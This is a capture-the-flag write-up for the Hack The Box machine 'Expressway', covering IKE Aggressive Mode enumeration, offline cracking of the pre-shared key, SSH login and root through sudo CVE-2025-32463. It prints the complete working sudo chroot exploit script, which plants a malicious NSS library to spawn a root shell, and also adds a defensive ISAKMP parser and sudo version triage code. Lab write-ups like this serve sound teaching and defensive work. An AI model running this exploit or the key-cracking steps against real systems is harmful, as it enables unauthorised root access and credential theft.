HTB Expressway Writeup: Ike password crack to sudo privilege escalation

Expressway is an easy-difficulty machine that involves exploiting a weak IKE configuration by cracking the PSK to gain initial access, then escalating privileges to root through sudo and CVE-2025-32463. This writeup explains how to obtain both the user and root flags on the box.
- The initial nmap scan shows us only one open port (22/tcp, SSH):
$ nmap -sC -sV --top-ports=5000 10.129.88.123
<SNIP>
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 10.0p2 Debian 8 (protocol 2.0)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
- We could have tried to brute-force SSH with a set of common credentials, but let's run a UDP scan first:
$ sudo nmap -sU 10.129.88.123 --top-ports=200
<SNIP>
Not shown: 196 closed udp ports (port-unreach)
PORT STATE SERVICE
68/udp open|filtered dhcpc
69/udp open|filtered tftp
500/udp open isakmp
4500/udp open|filtered nat-t-ike
- The UDP scan revealed that port 500 was open, which is commonly associated with IKE/IPsec. Since this service is typically used for VPN negotiation, we can enumerate it further with ike-scan. According to its description, this tool discovers IKE hosts and can also fingerprint them using their retransmission backoff pattern. The initial enumeration command looks like this:
$ sudo ike-scan -M -A 10.129.88.123
Starting ike-scan 1.9.5 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.129.88.123 Aggressive Mode Handshake returned
HDR=(CKY-R=bf340b79a285bda0)
SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
KeyExchange(128 bytes)
Nonce(32 bytes)
ID(Type=ID_USER_FQDN, Value=ike@expressway.htb)
VID=09002689dfd6b712 (XAUTH)
VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0)
Hash(20 bytes)
- The initial ike-scan confirmed that the target was running IKE in Aggressive Mode on UDP port 500. This is especially interesting because Aggressive Mode can reveal enough information to make offline PSK cracking possible. In this case, the response disclosed the identity ike@expressway.htb together with the handshake parameters, which gave us everything needed for further enumeration and an attempt to recover the pre-shared key:
$ sudo ike-scan -A --pskcrack 10.129.88.123
Starting ike-scan 1.9.6 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.129.88.123 Aggressive Mode Handshake returned HDR=(CKY-R=9aec8d19b02c2ceb) SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800) KeyExchange(128 bytes) Nonce(32 bytes) ID(Type=ID_USER_FQDN, Value=ike@expressway.htb) VID=09002689dfd6b712 (XAUTH) VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0) Hash(20 bytes)
IKE PSK parameters (g_xr:g_xi:cky_r:cky_i:sai_b:idir_b:ni_b:nr_b:hash_r):
- Running ike-scan with the --pskcrack option returned the full set of parameters required for offline PSK cracking. The response confirmed that the service was using Aggressive Mode and exposed the handshake material, including the identity ike@expressway.htb. This output can be saved to a file and passed to psk-crack:
$ psk-crack --dictionary /home/copper_nail/Desktop/rockyou.txt hashes.txt
Starting psk-crack [ike-scan 1.9.5] (http://www.nta-monitor.com/tools/ike-scan/)
Running in dictionary cracking mode
key "freakin<PASSWORD_REDACTED>theroad" matches SHA1 hash 4f8ad1c8d9afcccc555105c5912a9bff3f9ddcad
Ending psk-crack: 8045040 iterations in 12.410 seconds (648290.76 iterations/sec)
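The exposure described above is visible in the responder's first message alone: the exchange type byte says Aggressive Mode, and the ID and Hash payloads travel in the clear. The following parser and detection rule are an added example written for this writeup (not part of the original post or of ike-scan); the sample datagram is constructed to mirror the payload order ike-scan reported, with placeholder SA, KE, Nonce and Hash bodies.

```python
import struct

# ISAKMP header (RFC 2408): cookie_i(8) cookie_r(8) next_payload(1) version(1) exchange_type(1) flags(1) msg_id(4) length(4)
ISAKMP_HDR = struct.Struct("!8s8sBBBBII")
EXCHANGE = {2: "Identity Protection (Main Mode)", 4: "Aggressive Mode", 5: "Informational", 32: "Quick Mode"}
PAYLOAD = {1: "SA", 4: "KeyExchange", 5: "ID", 8: "Hash", 10: "Nonce", 13: "VID"}

def parse_isakmp(data):
    """Walk the ISAKMP header and payload chain; raise ValueError on a malformed length."""
    if len(data) < ISAKMP_HDR.size:
        raise ValueError("short ISAKMP header")
    _cky_i, _cky_r, nxt, ver, xchg, _flags, _msg_id, length = ISAKMP_HDR.unpack_from(data)
    if length != len(data):
        raise ValueError("ISAKMP length field does not match datagram size")
    pkt = {"version": f"{ver >> 4}.{ver & 0xF}", "exchange_type": xchg,
           "exchange": EXCHANGE.get(xchg, f"type {xchg}"), "payloads": [], "identity": None}
    off = ISAKMP_HDR.size
    while nxt != 0:                      # generic payload header: next(1) reserved(1) length(2)
        if off + 4 > len(data):
            raise ValueError("payload chain runs past end of datagram")
        following, _reserved, plen = struct.unpack_from("!BBH", data, off)
        if plen < 4 or off + plen > len(data):
            raise ValueError("bad payload length")
        pkt["payloads"].append(PAYLOAD.get(nxt, f"type {nxt}"))
        if nxt == 5 and plen > 8 and data[off + 4] in (2, 3):   # ID payload: ID_FQDN / ID_USER_FQDN are printable
            pkt["identity"] = data[off + 8:off + plen].decode("ascii", "replace")
        nxt, off = following, off + plen
    return pkt

def aggressive_mode_exposure(pkt):
    """Detection rule: an IKEv1 Aggressive Mode message carrying both ID and Hash in the clear
    gives anyone who can observe or elicit it the material for offline PSK guessing."""
    return (pkt["version"] == "1.0" and pkt["exchange_type"] == 4
            and "ID" in pkt["payloads"] and "Hash" in pkt["payloads"])

def _payload(next_type, body):
    return struct.pack("!BBH", next_type, 0, 4 + len(body)) + body

def build_sample_response():
    """Constructed responder message mirroring the payload order ike-scan reported above (not a real capture)."""
    body = (_payload(4, b"\x00" * 8)                                      # SA (body elided) -> KeyExchange
            + _payload(10, b"\x00" * 128)                                 # KeyExchange -> Nonce
            + _payload(5, b"\x00" * 32)                                   # Nonce -> ID
            + _payload(13, b"\x03\x00\x00\x00" + b"ike@expressway.htb")   # ID (type 3 = ID_USER_FQDN) -> VID
            + _payload(13, bytes.fromhex("09002689dfd6b712"))             # VID (XAUTH) -> VID
            + _payload(8, bytes.fromhex("afcad71368a1f1c96b8696fc77570100"))  # VID (DPD) -> Hash
            + _payload(0, b"\x00" * 20))                                  # Hash -> end of chain
    hdr = ISAKMP_HDR.pack(b"\x11" * 8, b"\x22" * 8, 1, 0x10, 4, 0, 0, ISAKMP_HDR.size + len(body))
    return hdr + body
```

On a live network the same rule maps to a capture filter on the exchange-type byte (`udp port 500 and udp[26] = 4`); a gateway that only offers Main Mode or IKEv2 never produces a match.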
- We can try the recovered password together with the username from the IKE identity over SSH:
$ ssh ike@10.129.88.123
<SNIP>
ike@expressway:~$ whoami
ike
ike@expressway:~$ cat user.txt
3929c8c6<FLAG_REDACTED>c5cc891
- We now have the user flag and can run a regular enumeration routine on the box. Eventually we find that the installed sudo version is 1.9.17:
ike@expressway:/tmp$ sudo --version
Sudo version 1.9.17
- After identifying the installed sudo version, we searched for public information and found that it was affected by CVE-2025-32463, a local privilege escalation vulnerability in sudo versions before 1.9.17p1.
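Version triage is the defender's half of this step: the fix for CVE-2025-32463 shipped in 1.9.17p1, so a plain string comparison misclassifies the patched release. The following check is an added example written for this writeup (not from the original post or the sudo project); the host inventory is constructed, and the lower bound of the affected range is taken from the upstream advisory, which lists 1.9.14 as the first release with the -R/--chroot option.

```python
import re
import subprocess

# Affected range per the upstream advisory (the -R/--chroot option shipped in 1.9.14); fix landed in 1.9.17p1.
AFFECTED_FROM = (1, 9, 14, 0)
FIXED_IN = (1, 9, 17, 1)

def parse_sudo_version(text):
    """Turn 'Sudo version 1.9.17p1' (or a bare '1.9.17') into (major, minor, patch, plevel) for comparison.
    A missing 'pN' suffix counts as patch level 0, so 1.9.17 sorts below 1.9.17p1."""
    m = re.search(r"\b(\d+)\.(\d+)\.(\d+)(?:p(\d+))?", text)
    if not m:
        raise ValueError(f"no sudo version string in {text!r}")
    major, minor, patch, plevel = m.groups()
    return int(major), int(minor), int(patch), int(plevel or 0)

def is_affected_cve_2025_32463(version_text):
    return AFFECTED_FROM <= parse_sudo_version(version_text) < FIXED_IN

def installed_sudo_version():
    """First line of the local `sudo --version` (runs the real binary; not used by the offline sample below)."""
    try:
        out = subprocess.run(["sudo", "--version"], capture_output=True, text=True, check=False).stdout
    except OSError:
        return ""
    return out.splitlines()[0] if out else ""

# Constructed inventory of `sudo --version` first lines collected from a fleet (hostnames are made up).
SAMPLE_INVENTORY = {
    "expressway": "Sudo version 1.9.17",
    "build-01": "Sudo version 1.9.17p1",
    "legacy-db": "Sudo version 1.9.13p3",
    "jump-02": "Sudo version 1.9.15p5",
}

def triage(inventory):
    """Return the hosts whose sudo falls inside the affected range, sorted for a stable report."""
    return sorted(host for host, line in inventory.items() if is_affected_cve_2025_32463(line))

if __name__ == "__main__":
    print("patch first:", triage(SAMPLE_INVENTORY))
```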
A full explanation of this vulnerability is beyond the scope of this writeup. For a detailed analysis, please refer to the following link. In any case, the full exploit code is shown below:
#!/bin/bash
# sudo-chwoot.sh
# CVE-2025-32463 – Sudo EoP Exploit PoC by Rich Mirch
# @ Stratascale Cyber Research Unit (CRU)
STAGE=$(mktemp -d /tmp/sudowoot.stage.XXXXXX)
cd ${STAGE?} || exit 1
cat > woot1337.c<<EOF
#include <stdlib.h>
#include <unistd.h>
__attribute__((constructor)) void woot(void) {
setreuid(0,0);
setregid(0,0);
chdir("/");
execl("/bin/bash", "/bin/bash", NULL);
}
EOF
mkdir -p woot/etc libnss_
echo "passwd: /woot1337" > woot/etc/nsswitch.conf
cp /etc/group woot/etc
gcc -shared -fPIC -Wl,-init,woot -o libnss_/woot1337.so.2 woot1337.c
echo "woot!"
sudo -R woot woot
rm -rf ${STAGE?}
- We can transfer exploit.sh to the target using any preferred method, or simply recreate it directly on the machine with a text editor such as nano or vim. Here nano is used. Make the file executable, run it and read the root flag:
ike@expressway:~$ nano exploit.sh
<PASTE EXPLOIT AND SAVE IT WITH CTRL+X>
ike@expressway:~$ chmod +x exploit.sh
ike@expressway:~$ ./exploit.sh
woot!
root@expressway:/# whoami
root
root@expressway:/# cat /root/root.txt
62872b1a<FLAG_REDACTED>d208b
Final Thoughts
Congratulations! You have rooted Expressway, a great beginner-friendly machine that demonstrates how weaknesses in IKE authentication can lead to initial access, followed by local privilege escalation through a vulnerable sudo version.
